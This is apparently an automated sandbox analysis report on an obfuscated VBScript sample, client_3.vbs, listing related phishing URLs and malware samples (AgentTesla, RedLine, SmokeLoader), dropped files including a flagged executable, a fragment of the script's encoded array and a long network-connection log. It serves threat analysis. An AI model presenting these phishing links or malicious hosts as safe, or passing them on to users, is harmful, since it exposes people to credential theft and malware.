	https://pub-293ee7fa42274247834c50067ffbc67f.r2.dev/30zuth09clo23me.html#fcarron@amada.fr	Get hash	malicious	HTMLPhisher	Browse	104.18.3.35
	https://bing.com/ck/a?!&&p=2f55faedf6fc1518JmltdHM9MTY5NjIwNDgwMCZpZ3VpZD0xZTQzNThiOS1jYzA3LTY2MmEtMjQyNi00YjI5Y2QwZTY3MDgmaW5zaWQ9NTAwMw&HfTHbabxBD&ptn=3&dVsGhAkyII&hsh=3&fclid=1e4358b9-cc07-662a-2426-4b29cd0e6708&piGoKtkRRz&u=a1aHR0cHM6Ly9tYXJjdnQub3JnLw#&&yygpKSi20tdPtyhKL0uzLMyuyklOK6hMz880LNcrLDe3TEky1ysq1U8yryrXBwA=?salesbenelux@carboline.com%20https://bing.com/ck/a?!&&p=2f55faedf6fc1518JmltdHM9MTY5NjIwNDgwMCZpZ3VpZD0xZTQzNThiOS1jYzA3LTY2MmEtMjQyNi00YjI5Y2QwZTY3MDgmaW5zaWQ9NTAwMw&HfTHbabxBD&ptn=3&dVsGhAkyII&hsh=3&fclid=1e4358b9-cc07-662a-2426-4b29cd0e6708&piGoKtkRRz&u=a1aHR0cHM6Ly9tYXJjdnQub3JnLw#&&yygpKSi20tdPtyhKL0uzLMyuyklOK6hMz880LNcrLDe3TEky1ysq1U8yryrXBwA=?salesbenelux@carboline.com	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://outlooksicherheit.softr.app/	Get hash	malicious	Unknown	Browse	104.18.231.83
	file.exe	Get hash	malicious	RedLine	Browse	162.159.135.233
	Cci Scanned DOCS 8802.html	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	file.exe	Get hash	malicious	SmokeLoader	Browse	172.67.171.76
	https://u7917333.ct.sendgrid.net/ls/click?upn=YGB-2BZSImvMUGBgb4XYQSXRIg5Vn2hdGLwxA4-2Fd0NfaBwny9cGSC5GKj9ctJizos9nE-2BFigzwD40nqhW0oor2jnHevxlN5PWY3EFVUSdggPzLzOJ-2BEuu6us3N4Pl6hoapE5Vb_jrUqf5zwH7FzSx1F7hMR78V6ree-2Bd2G5UL9WgcJWbM0zbZQbEvFD7BN0qxBcscVf6NIhb7D-2FiatQpAihmM3nJSD-2BRivZ1J5tpB9sy4so6YrbKtlwE3j6oxq5NIXRdWUTAFvdPYJMIXR8gK5BfOakQ-2BBCjzSGjtPMS6nUA98fY9qr01yxhDyMoO9a-2FR6bW9UfHWXgLQjYkR7X9SJ-2By1Poi2AhlGXKhh3OmXrLjOh3n7qkwmduoGzqtSvj7bnfJPZw	Get hash	malicious	Unknown	Browse	104.17.2.184
	Trade Confirmation & Authorization Request #10042023.shtml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	SmokeLoader	Browse	172.67.181.144
	Ach_Payment.html	Get hash	malicious	Unknown	Browse	104.17.2.184
	castrrrrrrrrrrrrrrrFile.vbs	Get hash	malicious	AgentTesla	Browse	104.21.45.138

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	oMGTwbRGSf.exe	Get hash	malicious	Gurcu Stealer	Browse	93.93.131.124
	Remittance-Copy.scr.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	file.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	file.exe	Get hash	malicious	RedLine	Browse	93.93.131.124
	SHIPPING_DOCUMENTS.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	SHIPPING_DOCUMENTS.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	legend.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	castrrrrrrrrrrrrrrrFile.vbs	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	Tender_ENQ.NO_6-59512.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	93.93.131.124
	Bfgjjenmr.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	Bfgjjenmr.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	LPO.pdf.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	CjIkKhjdXj.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	93.93.131.124
	PO#SWASA2200157.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	93.93.131.124
	BE2039392-TT.vbs	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	IMG_Requestfdp.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	Presupuesto+Pago_realizados_03-09-2023.Pdf.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	16965013835371bade819b828d2ef6e24480e6d349f5b28ef4ea2aba6ea0633ce7f5b34953602.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	2023_Customer_Information_Export(1).docx.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	SWIFTCOPY_REF920019838910579011108311-PDF.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Reputation:	low
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1483040
Entropy (8bit):	7.1086567834462695
Encrypted:	false
SSDEEP:	24576:MNbP9SNg9nmKu2HhIYjAY6RTVSTPkSnexozZTQAvTWjYIZTbRFPUN0gLuweIDak:6TRnU4/FQAiFxfPkao
MD5:	47E88C8E89C1E99CA76EC3D8BAB8C3D8
SHA1:	2EB0D2AD0730ADACA7A4A8DD32715CD4B3809721
SHA-256:	13D499124F676B7D0E326C36A6AF6D9968E8EB6B66F98FCEFB166EAE22149B7C
SHA-512:	7ACDE2C6713B70E2344BE2A5F76D1867DA8CE30BF9A90AFB9044B6D65FFEE1580E7E18722DD7960304EF583F16833B6CFB62FC648487F076F394401C25AB2FC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......d.................Z..........&.............@..................................#....@.................................h...........@............J.. W...0...................................... ...............l...P............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....@..........................@....00cfg.......P......................@..@.tls.........`......................@....voltbl......p...........................rsrc...@...........................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5r34s5rb.nu4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzmkbj2i.03h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	ASCII text, with very long lines (18854), with CRLF line terminators
Entropy (8bit):	4.364277268075731
TrID:
File name:	client_3.vbs
File size:	23'407 bytes
MD5:	3dd859f7aa6f95b80aae2c7c4b5eaaf9
SHA1:	3ef2f7246e9dee40ca9b6a7ecc0b5c7568367e80
SHA256:	8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6
SHA512:	9552049edd58c22dac6f081c110eaebbcc23f0c28e3544c8387da5a1be376fbf0b7c777a95bc1277c5246f8588be7632fd9f335d428bdc58864c870d04d9f994
SSDEEP:	384:GOjk+QtGIKg7ETp2FHIKIGZVgXFpmcMYqYaGmPUVdE/MMMWm4qVuAL:I9eYjTT//0MjgVuAL
TLSH:	3CB27D6D034FA8F89773ACC88AD5AC53FB74872A4A2CC6C49F30FEEA2414574A4E551D
File Content Preview:	vjcEDsloYpqLCIMcTRfnanJ = array(190, 208, 130, 209, 202, 204, 184, 211, 112, 231, 205, 212, 220, 228, 202, 115, 214, 217, 225, 224, 127, 117, 186, 182, 178, 152, 155, 185, 199, 148, 124, 153, 205, 210, 195, 99, 157, 152, 197, 122, 148, 152, 181, 182, 184,

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2023 18:48:02.122371912 CEST	49683	80	192.168.2.4	104.21.75.133
Oct 5, 2023 18:48:02.271744013 CEST	80	49683	104.21.75.133	192.168.2.4
Oct 5, 2023 18:48:02.271955013 CEST	49683	80	192.168.2.4	104.21.75.133
Oct 5, 2023 18:48:02.273109913 CEST	49683	80	192.168.2.4	104.21.75.133
Oct 5, 2023 18:48:02.422648907 CEST	80	49683	104.21.75.133	192.168.2.4
Oct 5, 2023 18:48:02.812376976 CEST	80	49683	104.21.75.133	192.168.2.4
Oct 5, 2023 18:48:02.812428951 CEST	80	49683	104.21.75.133	192.168.2.4
Oct 5, 2023 18:48:02.812541962 CEST	49683	80	192.168.2.4	104.21.75.133
Oct 5, 2023 18:48:03.161210060 CEST	49684	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:03.161267996 CEST	443	49684	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:03.161334991 CEST	49684	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:03.172454119 CEST	49684	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:03.172475100 CEST	443	49684	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:03.743627071 CEST	443	49684	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:03.743762970 CEST	49684	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:03.748027086 CEST	49684	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:03.748043060 CEST	443	49684	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:03.748455048 CEST	443	49684	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:03.774269104 CEST	49684	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:03.818445921 CEST	443	49684	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:04.275290012 CEST	443	49684	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:04.275367022 CEST	443	49684	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:04.275459051 CEST	49684	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:04.278856039 CEST	49684	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:04.280518055 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:04.280566931 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:04.280658960 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:04.280888081 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:04.280901909 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:04.842847109 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:04.844772100 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:04.844794989 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.390980959 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.391038895 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.391242027 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.391263008 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.446753025 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.664516926 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.664592028 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.664788008 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.664808035 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.664870024 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.664916039 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.664954901 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.665018082 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.665082932 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.665152073 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.747982025 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.748138905 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.938333035 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.938595057 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.938733101 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.938822985 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.939203978 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.939275980 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.939702034 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.939779043 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.940058947 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.940133095 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:05.977785110 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:05.977929115 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.021656990 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.021801949 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.212492943 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.212634087 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.212812901 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.212966919 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.213246107 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.213319063 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.213510990 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.213579893 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.213968992 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.214045048 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.214468956 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.214544058 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.214724064 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.214791059 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.215131998 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.215204954 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.215430975 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.215497971 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.215893984 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.215960979 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.216375113 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.216438055 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.250705957 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.250895023 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.295749903 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.295844078 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.295859098 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.295874119 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.295902967 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.295922041 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.487174034 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.487423897 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.487446070 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.487529039 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.488014936 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.488101959 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.488379955 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.488467932 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.488791943 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.488867998 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.489267111 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.489362001 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.489680052 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.489754915 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.490340948 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.490418911 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.490664959 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.490734100 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.491051912 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.491125107 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.491539955 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.491609097 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.491888046 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.491957903 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.492257118 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.492326975 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.492635012 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.492706060 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.493192911 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.493268967 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.493552923 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.493628979 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.493901968 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.493983030 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.494385958 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.494455099 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.494755983 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.494822979 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.495088100 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.495157003 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.495534897 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.495942116 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.496586084 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.496613026 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.506572962 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.524869919 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.525083065 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.525382996 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.525475025 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.525825024 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.525898933 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.570899963 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.570975065 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.571094990 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.571094990 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.571114063 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.571286917 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.571600914 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.571748018 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.762572050 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.762731075 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.762782097 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.762850046 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.762887001 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.762909889 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.763094902 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.763168097 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.763323069 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.763402939 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.763843060 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.763926029 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.764148951 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.764214993 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.764523983 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.764604092 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.764925003 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.764995098 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.765312910 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.765392065 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.765731096 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.765796900 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.766119957 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.766194105 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.766333103 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.766398907 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.766967058 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.767044067 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.767296076 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.767365932 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.767765999 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.767843008 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.768210888 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.768279076 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.768496037 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.768567085 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.768882036 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.768950939 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.769351959 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.769426107 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.769670010 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.769737005 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.770051956 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.770123005 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.770618916 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.770683050 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.770804882 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.770869017 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.771262884 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.771327019 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.771723032 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.771787882 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.772216082 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.772284985 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.772459984 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.772522926 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.772764921 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.772830963 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.773319006 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.773385048 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.773746967 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.773813963 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.774070024 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.774133921 CEST	49685	443	192.168.2.4	93.93.131.124
Oct 5, 2023 18:48:06.774461985 CEST	443	49685	93.93.131.124	192.168.2.4
Oct 5, 2023 18:48:06.774540901 CEST	49685	443	192.168.2.4	93.93.131.124
